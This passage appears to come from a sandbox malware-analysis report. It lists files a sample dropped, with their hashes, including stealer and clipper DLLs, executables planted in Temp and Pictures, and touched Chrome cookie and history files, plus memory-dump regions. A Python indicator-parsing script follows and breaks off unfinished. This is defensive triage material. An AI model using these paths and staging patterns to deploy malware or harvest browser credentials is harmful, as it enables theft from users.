| SHA256 | 1668b42dd771d0cfd2cd6a92052ede1e8004d736defcb1af94013dacbfbc5fdd |
| SHA512 | 5511a6b4a352fc607ec92d407b68a4d3f7c28315a7932b2004f6224ee72582367e4b097034d5b1daaa4b253489f39ee3b01a441dfc203380e306cfa63720aee7 |
memory/2224-236-0x0000000000D70000-0x000000000122E000-memory.dmp
memory/1444-237-0x0000000000590000-0x0000000000B7B000-memory.dmp
memory/1444-238-0x0000000000590000-0x0000000000B7B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 614a913bfd6f7dc33710847e6451b361 |
| SHA1 | c2cf5ad51bab1b788ab3d17a14c63fcf2a11ca3b |
| SHA256 | a387f4265db3e91bbf7720d2b103414fb87afb874010d01b71cba6f0a2a625c1 |
| SHA512 | 833c5caacd88b9c85696ee96348e41d7594c54f46aeaf4b1f5baf5c1bfae6bf68b2c063e779bd55e08e37bb091d3aa0d596e40740256cc681a2a1b777c03a94c |
memory/3188-246-0x0000000000BD0000-0x00000000010AE000-memory.dmp
memory/3188-247-0x0000000000BD0000-0x00000000010AE000-memory.dmp
memory/3188-254-0x0000000004E10000-0x0000000004E11000-memory.dmp
memory/3188-253-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/3188-252-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
memory/3188-251-0x0000000004E20000-0x0000000004E21000-memory.dmp
memory/3188-250-0x0000000004DD0000-0x0000000004DD1000-memory.dmp
memory/3188-249-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
memory/3188-248-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/1308-264-0x0000000000D70000-0x000000000122E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
| MD5 | 1c7d0f34bb1d85b5d2c01367cc8f62ef |
| SHA1 | 33aedadb5361f1646cffd68791d72ba5f1424114 |
| SHA256 | e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c |
| SHA512 | 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d |
memory/4964-288-0x0000000000400000-0x000000000044C000-memory.dmp
memory/4964-291-0x0000000000400000-0x000000000044C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
| MD5 | 31841361be1f3dc6c2ce7756b490bf0f |
| SHA1 | ff2506641a401ac999f5870769f50b7326f7e4eb |
| SHA256 | 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee |
| SHA512 | 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019 |
memory/2672-312-0x0000000000400000-0x0000000000592000-memory.dmp
memory/2224-313-0x0000000000D70000-0x000000000122E000-memory.dmp
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
| MD5 | 0c582da789c91878ab2f1b12d7461496 |
| SHA1 | 238bd2408f484dd13113889792d6e46d6b41c5ba |
| SHA256 | a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67 |
| SHA512 | a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a |
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
| MD5 | 20ae0bb07ba77cb3748aa63b6eb51afb |
| SHA1 | 87c468dc8f3d90a63833d36e4c900fa88d505c6d |
| SHA256 | daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d |
| SHA512 | db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2 |
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
| MD5 | b22521fb370921bb5d69bf8deecce59e |
| SHA1 | 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea |
| SHA256 | b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158 |
| SHA512 | 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c |
C:\Users\Admin\AppData\Local\Temp\TmpE956.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/3676-382-0x0000000000400000-0x000000000044E000-memory.dmp
memory/3676-385-0x0000000000400000-0x000000000044E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
| MD5 | 0099a99f5ffb3c3ae78af0084136fab3 |
| SHA1 | 0205a065728a9ec1133e8a372b1e3864df776e8c |
| SHA256 | 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226 |
| SHA512 | 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6 |
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
| MD5 | 8510bcf5bc264c70180abe78298e4d5b |
| SHA1 | 2c3a2a85d129b0d750ed146d1d4e4d6274623e28 |
| SHA256 | 096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6 |
| SHA512 | 5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d |
memory/1444-430-0x0000000000590000-0x0000000000B7B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-801878912-692986033-442676226-1000\76b53b3ec448f7ccdda2063b15d2bfc3_20b07406-8e6f-45df-9efd-1cf7b8a931bf
| MD5 | f28b0a29349863310965b86aa5e1b0f0 |
| SHA1 | 86fbf7d5cf9993c95636187efbdcac9ff4b86bde |
| SHA256 | 76487be867feb610f51dbbd04b321faf6e2379904bffd8e74dd224e5168ec4a7 |
| SHA512 | 414d31b383cb09793945d6dc679e7ac990b9ad655b7efb1fff85712cf667a0446a1f49ed7776ac832c681fc0d91c42d34241be8168b4dbbdc27b61505e35c722 |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | ec06fcaf36c96f9349857d4e1ec99bec |
| SHA1 | 5d47225646435cee43fb58e2aa023ff9aad43ba4 |
| SHA256 | a184d3cbc824b2efebeda35db7f728b282f2a800cd79ac5d5586599caa62f687 |
| SHA512 | a2494fa78bd0b60b25a7ad35afb44d3546cff4ea3580defc0f066a45e4879b2f75f580552df6170dcbb5cbd043937ebbe5bc000705fc3cf70fde7a3709b07539 |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 0225d7dcf74b5c2ece3c3a8086fc872c |
| SHA1 | 7016074d4299adc8abbd68836f34396a01e768b1 |
| SHA256 | fbd407cf33457adc7a7d0323a90defa7ff113565b9fce0f21d76bb4982b11b98 |
| SHA512 | 90278c076639abc3901d3955ce2b2b046c4358dbda811fe35520ab5f6259ccdc33dd42d5eeade8f448e01477e6ead1b634e3f9b10038f88b315649291ba162f4 |
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
| MD5 | 586f7fecacd49adab650fae36e2db994 |
| SHA1 | 35d9fb512a8161ce867812633f0a43b042f9a5e6 |
| SHA256 | cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e |
| SHA512 | a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772 |
memory/3188-473-0x0000000000BD0000-0x00000000010AE000-memory.dmp
memory/5164-478-0x0000000000400000-0x000000000063B000-memory.dmp
memory/5164-482-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
| MD5 | 7fabf15848c951f6665ec449c8c77098 |
| SHA1 | f9ef6114a8e2d3838d0cadd4a71d6baf95e133cf |
| SHA256 | a440e88b2c1d1746b82ffaadaef0571a14f3d76dbabba87b0c3de6ac5eff2f35 |
| SHA512 | 4e8b84b13bf04befb12d2f1b2f36a1a7285be640315c1a8eb61137f77ca2202b62892d95fee02debaa75ca3b5d782a5d0a7a08a010206929187504a91e9ddb0a |
C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll
| MD5 | f35b671fda2603ec30ace10946f11a90 |
| SHA1 | 059ad6b06559d4db581b1879e709f32f80850872 |
| SHA256 | 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7 |
| SHA512 | b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705 |
memory/5164-524-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
| MD5 | 094d5369b61043e7aa49d54345964e1a |
| SHA1 | ee96818434c1955ad3aebff548782dae92e596af |
| SHA256 | d4469817bf45d35310e58d9dd25df1b76a9666fb5aabad09cb84168ea8dd9e11 |
| SHA512 | 578aaa9ba49351605466075f86dd0d536c0b68264862392cb71382a7c4a9e1864b3c84181197d96dc8fde8131e9bd53fabd6716d27e35f291e5949fbae1a2eef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
| MD5 | b77562e5eea1de2d2d2efeb514597d2c |
| SHA1 | 7c336c26829cc09eb857d41da1c709f03df24dad |
| SHA256 | 0f1baf0978a5ee5c05e60a9899789c772931a94bf092a36b704854ccf9a80887 |
| SHA512 | e512ba731931c7a0f6673fbe92f1f3a0ad14f348c520d75d0206a0af374bb8454d9ce16197d4c14fbc455517b81275b6b438481ba3bd2b3f63c712fe5de70ad7 |
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
| MD5 | 6184676075afacb9103ae8cbf542c1ed |
| SHA1 | bc757642ad2fcfd6d1da79c0754323cdc823a937 |
| SHA256 | a0b0b39b69005a2d39a8b8271a3518aa0a55148b794d2b4995b3c87ed183b23b |
| SHA512 | 861ac361b585a069f2274b577b30f2a13baf72a60acd4f22da41885aee92c3975445150822f1072590d7b574ff54eb3abde6a6c4f800988ab9ff4344884f41fa |
C:\Users\Admin\Pictures\JiqUwC5ldbcrv3pY884Icp5f.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\rlNOp7Kno1h2LmbasjhWLrqn.exe
| MD5 | dcc50ec1cc74d2f605b455885e781f40 |
| SHA1 | 594447e41168142a701dff4ce16182f50921a064 |
| SHA256 | bc67a67c9441eb9220a42bda0af159fa9ae2eefcfb83370d28157bed5436dea4 |
| SHA512 | 23422811b4c3ba39b9f4a44654e9547e6e42e8bbac857f02ce086686572860d9964674fc67d8a4020c4794f6bcf98311be51fd0f3dfc6b910bd4f118975886b5 |
C:\Users\Admin\AppData\Local\Temp\tmp104B.tmp
| MD5 | 615585c42f35c65b594799c0d90e5d29 |
| SHA1 | 11177a4ab1627f9405781375a531a3e4df1536a4 |
| SHA256 | c53ef83812d0110266b6e19df160f490aed321317273f05ad5d7921c4b5c5053 |
| SHA512 | e59ebdd16e46444d19889e25963092759f79678f8d40bc307634a184d20d75a1884b320a84a78cfacabc1d02a46cf041686fdae1f8c29b13f221098533b2a99b |
C:\Users\Admin\AppData\Local\Temp\tmp102A.tmp
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\tmp113F.tmp
| MD5 | 14ccc9293153deacbb9a20ee8f6ff1b7 |
| SHA1 | 46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3 |
| SHA256 | 3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511 |
| SHA512 | 916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfyzqxut.juz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Program Files (x86)\GameServerClient\installg.bat
| MD5 | b6b57c523f3733580d973f0f79d5c609 |
| SHA1 | 2cc30cfd66817274c84f71d46f60d9e578b7bf95 |
| SHA256 | d8d718641bdf39cca1a5db7bb52d3c66d400a97bef3cafdd81cd7e711a51c570 |
| SHA512 | d39440163592bc3b1cb7830f236a97d5819c10775e453637d5a04a981e9a336480c6b4701afdceba0d52dfe09413b7abe2ad58ff55b5057a26229f3ccdc3a7c7 |
C:\Program Files (x86)\GameServerClient\GameService.exe
| MD5 | d9ec6f3a3b2ac7cd5eef07bd86e3efbc |
| SHA1 | e1908caab6f938404af85a7df0f80f877a4d9ee6 |
| SHA256 | 472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c |
| SHA512 | 1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4 |
C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe
| MD5 | 5f05f37e69ea3c8d5b7227831cdc7225 |
| SHA1 | 8404c681d6dd5a465d78497dadca43631556c8a8 |
| SHA256 | 1024e1a42de8264174d2c1b6e9a4f1ed16a75496e18d739cd403f2417c93b79f |
| SHA512 | a6761c7b1219c133bdf5dc77845a0db7c5c2c6d3fe872420753f1ed2639fba71a0ba1b16d205b3676b216a488cd1440639f71f5ce530e7b8634edd271366ef85 |
C:\Users\Admin\AppData\Local\Temp\u4q0.0.exe
| MD5 | ce973cd51fa98b694da3eff7cc2f18a4 |
| SHA1 | 8288ebe7f7d07075208160212d240aee5cdc1ad3 |
| SHA256 | 543281e6bc99b7e20ce3719d1fb2d3a8d34d62fd5153d233022c42ee1cc48ed7 |
| SHA512 | 16ec39ed84b8edfaec9fdfb362686ab8008bbf0d6dbaf03dd16d8b9d59faae76a757758c0edf3264e3adeae791c199db15eebcc4c09848923c2e738661befb2d |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
| MD5 | 4b3ecd88e99983a652012b9a6db4e3d8 |
| SHA1 | 54082418be9e7159e5af6f67665cea57430f44f1 |
| SHA256 | 9a9524477954f6cdead10a13d13941d1dcf32b9e73bf320cad2e383f34752e5e |
| SHA512 | 76e3a84f1b674846f69fe74ef4c64dc3373ced8a9a5499c997b40a03d17203be5c3fa51ea02d1850a636afc4c9c69f3b120c3a27242afaea9128c03a8ae7f941 |
C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll
| MD5 | 154c3f1334dd435f562672f2664fea6b |
| SHA1 | 51dd25e2ba98b8546de163b8f26e2972a90c2c79 |
| SHA256 | 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f |
| SHA512 | 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404251441238985704.dll
| MD5 | 45fe60d943ad11601067bc2840cc01be |
| SHA1 | 911d70a6aad7c10b52789c0312c5528556a2d609 |
| SHA256 | 0715f9558363b04526499fcd6abf0b1946950af0a7f046a25f06b20dddb67add |
| SHA512 | 30c82f6b329fefa5f09a5974c36b70ea2bdab273e7d6eadd456fddcc2aa693f8f1cf096d57c3719d1106e9f85d50a4ffbf0ed7e66da2da0a5f23b6ee8c7194ba |
C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe
| MD5 | 69f6614893028c60394f744c7ebc1551 |
| SHA1 | ccd4a9f86876ddbfe2bc86a2b17a4cbc1857b1dd |
| SHA256 | b96a4de2d4f97380388b6b515e8cdef28a92f358a7d487be3463828303d8661d |
| SHA512 | 4a40bcf25303accf93bb15e281a53ee0cda93c1f7c1ede741338b8080daa0a61c6751c5d11ed8ceeec520782913f748298b5016565a31f47c980d8e868461855 |
C:\Users\Admin\AppData\Local\Temp\u4q0.1.zip
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
C:\Users\Admin\Pictures\WTaCK9GXrirZJlizQT8dmwTe.exe
| MD5 | d981fb3fc1f28bea729db051c75dae08 |
| SHA1 | d5eea12045a6d998da1a362f70748fc09874d0b4 |
| SHA256 | aa5689332012817778e4ef3602e918297c567c4d573b463f86e8d98fef2eb48f |
| SHA512 | a93576bc04ac5b1ba129913c3d4e5100cf7f0f8bd7a4c9a21ce3af645624890006e087eefa5d0cbd804b7b96ebc13cf32a722b8c1d66d409879f41d5bfa974cb |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | c75bb60cff17677669c6e269bf0bb94a |
| SHA1 | f306d26f28af3cab7e7b080691bb8c573dccdccb |
| SHA256 | a92094c1c9fc6a818d05f286e68e4d40a70a13c2e9c95a924d4d5cf794fbfe71 |
| SHA512 | b9d14a871f84a69276d9858eed1150bd5e84a832f1570c51f04580595cc6cd51218a5d7c6288d073100bfeb2a8bfbbd6e8be022318ff618f7c07240fc2c8413e |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\opera_package
| MD5 | b7e7c07657383452919ee39c5b975ae8 |
| SHA1 | 2a6463ac1eb8be1825b123b12f75c86b7fff6591 |
| SHA256 | 1d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9 |
| SHA512 | daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\additional_file0.tmp
| MD5 | 15d8c8f36cef095a67d156969ecdb896 |
| SHA1 | a1435deb5866cd341c09e56b65cdda33620fcc95 |
| SHA256 | 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8 |
| SHA512 | d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | aacea6e00412e59f4327554269a0092f |
| SHA1 | aac12dcbe54c05989c249ed08aea2476684c0982 |
| SHA256 | c8a186d5a22c65770dee456a7987b02bb1dc202028840965f5177790a82c9251 |
| SHA512 | 3d2ba34086bea3a6647e6da4738e583e842c673744af53938669258bc643febe9faa019e86134356faa4240d240e4039eddca471e2f9e6f08533c1e6090f7bb7 |
C:\Users\Admin\AppData\Local\Temp\tmpB708.tmp
| MD5 | 22be08f683bcc01d7a9799bbd2c10041 |
| SHA1 | 2efb6041cf3d6e67970135e592569c76fc4c41de |
| SHA256 | 451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457 |
| SHA512 | 0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936 |
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\gMqqyxU.exe
| MD5 | e77964e011d8880eae95422769249ca4 |
| SHA1 | 8e15d7c4b7812a1da6c91738c7178adf0ff3200f |
| SHA256 | f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50 |
| SHA512 | 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | ca3caac391dfc99264c5c6194a4f99fc |
| SHA1 | 82cfe5d5f1749b236d91cf452219cc1010e3efc3 |
| SHA256 | b2e0335bb9bbd99953521ccca591b1ed3765b9042c0c879c003022c226627cbd |
| SHA512 | 387727bb7483d39ec45e7884f90f914fb5c344d0f5cea43041407ba6e8b463785e02103359384ce5f069af13b636853aacdab1d6274a5d16b83aa9bbe8e87ec3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ln14indr.default-release\prefs.js
| MD5 | 78e24a17aa942a2c798a20685a627a4e |
| SHA1 | 9de9d7ce4f5f953c500285a044a2df1dba115844 |
| SHA256 | a20fcf4d41ca9650a15e4373e88a3d605d93c72ba6e7d4fc287dbc04e8b62aba |
| SHA512 | 4efa438ee9a3741b4661949cb7bd76db5f9f2d95e6e38d409bde39b7274ad2f2a349a2e3e6cdea4b80089d811549d0915bcfc900120528533dcac3b809d1878a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a1c8074957a801103b7f5bb0edac7f7b |
| SHA1 | 32e83998cedeba55ff5a09d4da1cfd03c0f4c6bc |
| SHA256 | 7e3923a91f561ed7fa7321aa7ccfbc604001c19be856bd0113eff02015dc86c0 |
| SHA512 | 95efccc145d83856473eb02e64323f7b02b538c9f67cf8ea551fd86f26822c2f43dd860961f7cccb625776d86bb3cbbc70fecfbfe9cff058ddc2756c52684807 |
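The entries above are the sandbox's raw inventory: `memory/<pid>-<index>-<start>-<end>-memory.dmp` lines for captured regions, and a path followed by MD5/SHA1/SHA256/SHA512 rows for each file the sample wrote. Working from that by hand is error-prone, so the following is an added example (my own code, not the report's or the sandbox vendor's) that parses the format into records, validates digest lengths, sets aside the zero-length crashpad pipe entry (its hashes are the well-known digests of empty input), deduplicates on SHA256 (the report lists some paths twice with different content), tags paths with triage heuristics, and summarizes memory dumps per PID. The sample input is constructed from a few entries copied verbatim from this listing; the tag names, the `NSS_DLLS` set and the "numbered staging directory" rule are analyst assumptions, not labels the report assigns.

```python
"""Turn a sandbox dropped-file / memory-dump listing into structured IOCs."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed offline input: entries copied verbatim from the listing above (SHA1/SHA512 rows omitted).
SAMPLE = r"""
memory/4912-78-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-82-0x0000000005420000-0x0000000005421000-memory.dmp
memory/2224-81-0x0000000000D70000-0x000000000122E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
| MD5 | 1c7d0f34bb1d85b5d2c01367cc8f62ef |
| SHA256 | e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c |
\??\pipe\crashpad_2692_GWUGPIQYIIBDWOQA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
C:\Users\Admin\Pictures\JiqUwC5ldbcrv3pY884Icp5f.exe
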